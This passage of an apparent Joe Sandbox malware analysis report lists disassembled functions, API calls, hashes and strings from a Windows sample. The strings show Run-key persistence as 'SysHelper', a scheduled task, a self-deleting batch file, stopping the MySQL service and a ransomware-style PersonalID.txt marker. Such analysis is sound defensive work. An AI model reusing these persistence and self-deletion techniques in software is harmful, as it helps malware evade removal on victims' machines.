                                                                                                                            • Associated: 00000000.00000002.1665552974.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665683673.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: f7a2a3c4e4e7b1265b14b7c3247eccdedd29083849295e66ade5a7e6f19b4579
                                                                                                                            • Instruction ID: 418c05dbf689c4732020dc68c3bfca6e864df3fd32629b86a6575d14899c0282
                                                                                                                            • Opcode Fuzzy Hash: f7a2a3c4e4e7b1265b14b7c3247eccdedd29083849295e66ade5a7e6f19b4579
                                                                                                                            • Instruction Fuzzy Hash: 73014B769106629BD700DF3EC8C045AFBF1BB082117528B3ADC9083A41D338F662DBE8
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1665415885.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665532937.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665552974.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665683673.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 5e3341b5f5026255b3e10dab3ee1a4deb800ad15e8bbd937bb2409ed5fdd4473
                                                                                                                            • Instruction ID: 6ebffecdd013a00237adbdf1a6f44b859355c32ab2a16901d45878d2342b18e9
                                                                                                                            • Opcode Fuzzy Hash: 5e3341b5f5026255b3e10dab3ee1a4deb800ad15e8bbd937bb2409ed5fdd4473
                                                                                                                            • Instruction Fuzzy Hash: 23C09B315002008FD725CB34DD613E273B27797301F199C95D51757014E73E9015C607
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}), ref: 004724FE
                                                                                                                            • GetLastError.KERNEL32 ref: 00472509
                                                                                                                            • CloseHandle.KERNEL32 ref: 0047251C
                                                                                                                            • CloseHandle.KERNEL32 ref: 00472539
                                                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,{FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}), ref: 00472550
                                                                                                                            • GetLastError.KERNEL32 ref: 0047255B
                                                                                                                            • CloseHandle.KERNEL32 ref: 0047256E
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1665415885.0000000000460000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665532937.000000000056A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665552974.000000000056C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000570000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000589000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665683673.000000000058B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseHandle$CreateErrorLastMutex
                                                                                                                            • String ID: "if exist "$" goto try$@echo off:trydel "$D$TEMP$del "$delself.bat${1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}${FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}
                                                                                                                            • API String ID: 2372642624-488272950
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _strncmp
                                                                                                                            • String ID: $-----$-----BEGIN $-----END $.\crypto\pem\pem_lib.c
                                                                                                                            • API String ID: 909875538-2733969777
                                                                                                                            APIs
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _free$__calloc_crt$___freetlocinfo___removelocaleref__calloc_impl__copytlocinfo_nolock__setmbcp_nolock__wsetlocale_nolock
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1503006713-0
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • PostQuitMessage.USER32(00000000), ref: 0047BB49
                                                                                                                            • DefWindowProcW.USER32(?,?,?,?), ref: 0047BBBA
                                                                                                                            • _malloc.LIBCMT ref: 0047BBE4
                                                                                                                            • GetComputerNameW.KERNEL32(00000000,?), ref: 0047BBF4
                                                                                                                            • _free.LIBCMT ref: 0047BCD7
                                                                                                                              • Part of subcall function 00471CD0: RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?,?,?,?,?,?,0052AC68,000000FF), ref: 00471D12
                                                                                                                              • Part of subcall function 00471CD0: _memset.LIBCMT ref: 00471D3B
                                                                                                                              • Part of subcall function 00471CD0: RegQueryValueExW.KERNEL32(?,SysHelper,00000000,?,?,00000400), ref: 00471D63
                                                                                                                              • Part of subcall function 00471CD0: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0052AC68,000000FF), ref: 00471D6C
                                                                                                                              • Part of subcall function 00471CD0: lstrlenA.KERNEL32(" --AutoStart,?,?), ref: 00471DD6
                                                                                                                              • Part of subcall function 00471CD0: PathFileExistsW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,-00000001), ref: 00471E48
                                                                                                                            • IsWindow.USER32(?), ref: 0047BF69
                                                                                                                            • DestroyWindow.USER32(?), ref: 0047BF7B
                                                                                                                            • DefWindowProcW.USER32(?,00008003,?,?), ref: 0047BFA8
                                                                                                                            Similarity
                                                                                                                            • API ID: Window$Proc$CloseComputerDestroyExistsFileMessageNameOpenPathPostQueryQuitValue_free_malloc_memsetlstrlen
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3873257347-0
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Similarity
                                                                                                                            • API ID: DecodePointer_write_multi_char_write_string$__aulldvrm__cftof_free_strlen
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 559064418-0
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • DecodePointer.KERNEL32 ref: 00487B29
                                                                                                                            • _free.LIBCMT ref: 00487B42
                                                                                                                              • Part of subcall function 00480BED: HeapFree.KERNEL32(00000000,00000000,?,0048507F,00000000,0048520D,00480CE9), ref: 00480C01
                                                                                                                              • Part of subcall function 00480BED: GetLastError.KERNEL32(00000000,?,0048507F,00000000,0048520D,00480CE9), ref: 00480C13
                                                                                                                            • _free.LIBCMT ref: 00487B55
                                                                                                                            • _free.LIBCMT ref: 00487B73
                                                                                                                            • _free.LIBCMT ref: 00487B85
                                                                                                                            • _free.LIBCMT ref: 00487B96
                                                                                                                            • _free.LIBCMT ref: 00487BA1
                                                                                                                            • _free.LIBCMT ref: 00487BC5
                                                                                                                            • EncodePointer.KERNEL32(00AA2110), ref: 00487BCC
                                                                                                                            • _free.LIBCMT ref: 00487BE1
                                                                                                                            • _free.LIBCMT ref: 00487BF7
                                                                                                                            • _free.LIBCMT ref: 00487C1F
                                                                                                                            Similarity
                                                                                                                            • API ID: _free$Pointer$DecodeEncodeErrorFreeHeapLast
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3064303923-0
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • CoInitialize.OLE32(00000000), ref: 00471BB0
                                                                                                                            • CoCreateInstance.OLE32(0052E908,00000000,00000001,0052D568,00000000), ref: 00471BC8
                                                                                                                            • CoUninitialize.OLE32 ref: 00471BD0
                                                                                                                            • SHGetSpecialFolderLocation.SHELL32(00000000,00000007,?), ref: 00471C12
                                                                                                                            • SHGetPathFromIDListW.SHELL32(?,?), ref: 00471C22
                                                                                                                            • lstrcatW.KERNEL32(?,00560050), ref: 00471C3A
                                                                                                                            • lstrcatW.KERNEL32(?), ref: 00471C44
                                                                                                                            • GetSystemDirectoryW.KERNEL32(?,00000100), ref: 00471C68
                                                                                                                            • lstrcatW.KERNEL32(?,\shell32.dll), ref: 00471C7A
                                                                                                                            Strings
                                                                                                                            Similarity
                                                                                                                            • API ID: lstrcat$CreateDirectoryFolderFromInitializeInstanceListLocationPathSpecialSystemUninitialize
                                                                                                                            • String ID: \shell32.dll
                                                                                                                            • API String ID: 679253221-3783449302
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • GetModuleHandleA.KERNEL32(?,?,00000001,?,004B4B72), ref: 004B49C7
                                                                                                                            • GetProcAddress.KERNEL32(00000000,_OPENSSL_isservice), ref: 004B49D7
                                                                                                                            • GetDesktopWindow.USER32 ref: 004B49FB
                                                                                                                            • GetProcessWindowStation.USER32(?,004B4B72), ref: 004B4A01
                                                                                                                            • GetUserObjectInformationW.USER32(00000000,00000002,00000000,00000000,?,?,004B4B72), ref: 004B4A1C
                                                                                                                            • GetLastError.KERNEL32(?,004B4B72), ref: 004B4A2A
                                                                                                                            • GetUserObjectInformationW.USER32(00000000,00000002,?,?,?,?,004B4B72), ref: 004B4A65
                                                                                                                            • _wcsstr.LIBCMT ref: 004B4A8A
                                                                                                                            Strings
                                                                                                                            Similarity
                                                                                                                            • API ID: InformationObjectUserWindow$AddressDesktopErrorHandleLastModuleProcProcessStation_wcsstr
                                                                                                                            • String ID: Service-0x$_OPENSSL_isservice
                                                                                                                            • API String ID: 2112994598-1672312481
                                                                                                                            • Opcode ID: def15fdeab4102e5c71a1adbd9b4d28d60df5fdc3bdb23aa13bf263bfcc715e6
                                                                                                                            • Instruction ID: eb447ca3da45c3805525e92da6640c3a47436316e7481d1e59ba4b6d3c247b8b
                                                                                                                            • Opcode Fuzzy Hash: def15fdeab4102e5c71a1adbd9b4d28d60df5fdc3bdb23aa13bf263bfcc715e6
                                                                                                                            • Instruction Fuzzy Hash: 57313931A401089BDB20DBB9EC466EE77B8EF98320F10061BE815D32D2EB3499159B64
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • GetStdHandle.KERNEL32(000000F4,004B4C16,%s(%d): OpenSSL internal error, assertion failed: %s,?,?,?,004B480E,.\crypto\cryptlib.c,00000253,pointer != NULL,?,004B1D37,00000000,0046CDAE,00000001,00000001), ref: 004B4AFA
                                                                                                                            • GetFileType.KERNEL32(00000000,?,004B1D37,00000000,0046CDAE,00000001,00000001), ref: 004B4B05
                                                                                                                            • __vfwprintf_p.LIBCMT ref: 004B4B27
                                                                                                                              • Part of subcall function 0048BDCC: _vfprintf_helper.LIBCMT ref: 0048BDDF
                                                                                                                            • vswprintf.LIBCMT ref: 004B4B5D
                                                                                                                            • RegisterEventSourceA.ADVAPI32(00000000,OPENSSL), ref: 004B4B7E
                                                                                                                            • ReportEventA.ADVAPI32(00000000,00000001,00000000,00000000,00000000,00000001,00000000,?,00000000), ref: 004B4BA2
                                                                                                                            • DeregisterEventSource.ADVAPI32(00000000), ref: 004B4BA9
                                                                                                                            • MessageBoxA.USER32(00000000,?,OpenSSL: FATAL,00000010), ref: 004B4BD3
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Event$Source$DeregisterFileHandleMessageRegisterReportType__vfwprintf_p_vfprintf_helpervswprintf
                                                                                                                            • String ID: OPENSSL$OpenSSL: FATAL
                                                                                                                            • API String ID: 277090408-1348657634
                                                                                                                            • Opcode ID: 1c0b9bc92b2df5103bb0e9b3929524a04e50226961d8e7772cba3f9066f4920d
                                                                                                                            • Instruction ID: 4e2bdff3829aa489a41b2a48ab9ab2279d0de42725087c09bcef62b72ae397aa
                                                                                                                            • Opcode Fuzzy Hash: 1c0b9bc92b2df5103bb0e9b3929524a04e50226961d8e7772cba3f9066f4920d
                                                                                                                            • Instruction Fuzzy Hash: E1219571648304ABE770A760CC4BFEF7B98AF98700F44481EF699861D1EBF894449767
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?), ref: 00472389
                                                                                                                            • _memset.LIBCMT ref: 004723B6
                                                                                                                            • RegQueryValueExW.ADVAPI32(?,SysHelper,00000000,00000001,?,00000400), ref: 004723DE
                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 004723E7
                                                                                                                            • GetCommandLineW.KERNEL32 ref: 004723F4
                                                                                                                            • CommandLineToArgvW.SHELL32(00000000,00000000), ref: 004723FF
                                                                                                                            • lstrcpyW.KERNEL32(?,00000000), ref: 0047240E
                                                                                                                            • lstrcmpW.KERNEL32(?,?), ref: 00472422
                                                                                                                            Strings
                                                                                                                            • SysHelper, xrefs: 004723D6
                                                                                                                            • Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 0047237F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CommandLine$ArgvCloseOpenQueryValue_memsetlstrcmplstrcpy
                                                                                                                            • String ID: Software\Microsoft\Windows\CurrentVersion\Run$SysHelper
                                                                                                                            • API String ID: 122392481-4165002228
                                                                                                                            • Opcode ID: 4d33f94a143495b812e8875840485addce7b16fcaabc54438496aed267abb08d
                                                                                                                            • Instruction ID: d683367246fdd22902d612250551eaca766244ee2758b057a6f1bdc7638c200e
                                                                                                                            • Opcode Fuzzy Hash: 4d33f94a143495b812e8875840485addce7b16fcaabc54438496aed267abb08d
                                                                                                                            • Instruction Fuzzy Hash: 3D115C7190020CABDF20DBA0DC49FEE7BBCBF05705F0045A5B509E2151DBB45A89AB90
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • std::exception::exception.LIBCMT ref: 004AF27F
                                                                                                                              • Part of subcall function 00490CFC: std::exception::_Copy_str.LIBCMT ref: 00490D15
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 004AF294
                                                                                                                              • Part of subcall function 00490ECA: RaiseException.KERNEL32(?,?,?,<yV,?,?,?,?,?,00483B9C,?,0056793C,?,00000001), ref: 00490F1F
                                                                                                                            • std::exception::exception.LIBCMT ref: 004AF2AD
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 004AF2C2
                                                                                                                            • std::regex_error::regex_error.LIBCPMT ref: 004AF2D4
                                                                                                                              • Part of subcall function 004AEF74: std::exception::exception.LIBCMT ref: 004AEF8E
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 004AF2E2
                                                                                                                            • std::exception::exception.LIBCMT ref: 004AF2FB
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 004AF310
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Exception@8Throwstd::exception::exception$Copy_strExceptionRaisestd::exception::_std::regex_error::regex_error
                                                                                                                            • String ID: bad function call$leS
                                                                                                                            • API String ID: 2464034642-3897984503
                                                                                                                            • Opcode ID: 58d96a165e4b1aa30d260988662588829391c18ca3d456cfb427b901a7a3f461
                                                                                                                            • Instruction ID: 5649ec8c1bbda7027ea540c0276f15566c6820ca005db5634286144776f8aebc
                                                                                                                            • Opcode Fuzzy Hash: 58d96a165e4b1aa30d260988662588829391c18ca3d456cfb427b901a7a3f461
                                                                                                                            • Instruction Fuzzy Hash: 8411DA74D4020DBBCF04EFA5C595CDDBFBCEA04348F40856ABD2597241EA74A3098B95
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Ex_nolock__lock__updatetlocinfo$___removelocaleref__calloc_crt__copytlocinfo_nolock__wsetlocale_nolock_wcscmp
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1077091919-0
                                                                                                                            • Opcode ID: 96662ada36a76d1a7765d0a99e2749c91491bb01b930d3a9ee949e51e962e5a5
                                                                                                                            • Instruction ID: 209b44514e889423210cb079ee489640a4411a90adcc9db559617a25bdd110a5
                                                                                                                            • Opcode Fuzzy Hash: 96662ada36a76d1a7765d0a99e2749c91491bb01b930d3a9ee949e51e962e5a5
                                                                                                                            • Instruction Fuzzy Hash: 70412832404705AFDB11BFA5DC42B9E7BE0AF44318F20482FF904A6282DB7D5645DF19
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _memmove
                                                                                                                            • String ID: invalid string position$string too long
                                                                                                                            • API String ID: 4104443479-4289949731
                                                                                                                            • Opcode ID: c771bd7d7ce1222d8b4af3ab698258f44f372902432810aa4f0bbb07d97d5a5e
                                                                                                                            • Instruction ID: 74d58e29b59375b18bba7abdcb903fb2842f0246db8b6843f5f5a445de9f1a38
                                                                                                                            • Opcode Fuzzy Hash: c771bd7d7ce1222d8b4af3ab698258f44f372902432810aa4f0bbb07d97d5a5e
                                                                                                                            • Instruction Fuzzy Hash: 2DC1AF71740209DFDB18CF0CC9889AE77A6EF84704B64C92EE859CB741DB34ED468B99
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • CoInitialize.OLE32(00000000), ref: 0046DAEB
                                                                                                                            • CoCreateInstance.OLE32(00534F6C,00000000,00000001,00534F3C,?,?,0052A948,000000FF), ref: 0046DB0B
                                                                                                                            • lstrcpyW.KERNEL32(?,?), ref: 0046DBD6
                                                                                                                            • PathRemoveFileSpecW.SHLWAPI(?,?,?,?,?,?,0052A948,000000FF), ref: 0046DBE3
                                                                                                                            • _memset.LIBCMT ref: 0046DC38
                                                                                                                            • CoUninitialize.OLE32 ref: 0046DC92
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1665415885.0000000000460000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665532937.000000000056A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665552974.000000000056C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000570000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000589000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665683673.000000000058B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateFileInitializeInstancePathRemoveSpecUninitialize_memsetlstrcpy
                                                                                                                            • String ID: --Task$Comment$Time Trigger Task
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • OpenSCManagerW.ADVAPI32(00000000,00000000,00000001), ref: 00471A1D
                                                                                                                            • OpenServiceW.ADVAPI32(00000000,MYSQL,00000020), ref: 00471A32
                                                                                                                            • ControlService.ADVAPI32(00000000,00000001,?), ref: 00471A46
                                                                                                                            • QueryServiceStatus.ADVAPI32(00000000,?), ref: 00471A5B
                                                                                                                            • Sleep.KERNEL32(?), ref: 00471A75
                                                                                                                            • QueryServiceStatus.ADVAPI32(00000000,?), ref: 00471A80
                                                                                                                            • CloseServiceHandle.ADVAPI32(00000000), ref: 00471A9E
                                                                                                                            • CloseServiceHandle.ADVAPI32(00000000), ref: 00471AA1
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Service$CloseHandleOpenQueryStatus$ControlManagerSleep
                                                                                                                            • String ID: MYSQL
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,?,00000000,?,?,00000000), ref: 004C54C8
                                                                                                                            • GetLastError.KERNEL32(?,?,00000000), ref: 004C54D4
                                                                                                                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,?,?,00000000), ref: 004C54F7
                                                                                                                            • GetLastError.KERNEL32(?,?,00000000), ref: 004C5503
                                                                                                                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,?,?,00000000,?,?,00000000), ref: 004C5531
                                                                                                                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,?,00000008,?,00000000,?,?,00000000), ref: 004C555B
                                                                                                                            • GetLastError.KERNEL32(.\crypto\bio\bss_file.c,000000A9,?,00000000,?,?,00000000), ref: 004C55F5
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                            • String ID: ','$.\crypto\bio\bss_file.c$fopen('
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00480FDD: __wfsopen.LIBCMT ref: 00480FE8
                                                                                                                            • _fgetws.LIBCMT ref: 0046C7BC
                                                                                                                            • _memmove.LIBCMT ref: 0046C89F
                                                                                                                            • CreateDirectoryW.KERNEL32(C:\SystemID,00000000), ref: 0046C94B
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateDirectory__wfsopen_fgetws_memmove
                                                                                                                            • String ID: C:\SystemID$C:\SystemID\PersonalID.txt
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • LoadLibraryW.KERNEL32(Shell32.dll), ref: 0046F338
                                                                                                                            • GetProcAddress.KERNEL32(00000000,SHGetFolderPathW), ref: 0046F353
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressLibraryLoadProc
                                                                                                                            • String ID: SHGetFolderPathW$Shell32.dll$\
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _malloc$__except_handler4_fprintf
                                                                                                                            • String ID: &#160;$Error encrypting message: %s$\\n
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1665415885.0000000000460000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665532937.000000000056A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665552974.000000000056C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000570000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000589000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665683673.000000000058B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _strncmp
                                                                                                                            • String ID: .\crypto\pem\pem_lib.c$DEK-Info: $ENCRYPTED$Proc-Type:
                                                                                                                            • API String ID: 909875538-2908105608
                                                                                                                            • Opcode ID: 601fb9226e58e4c13bcd2044f44ebf095003c98e086bcc708bd04483a72c316e
                                                                                                                            • Instruction ID: 8240e64272c4f650fbbac5631cc545d7236695a19a62bf5d51d63ecfe3a95359
                                                                                                                            • Opcode Fuzzy Hash: 601fb9226e58e4c13bcd2044f44ebf095003c98e086bcc708bd04483a72c316e
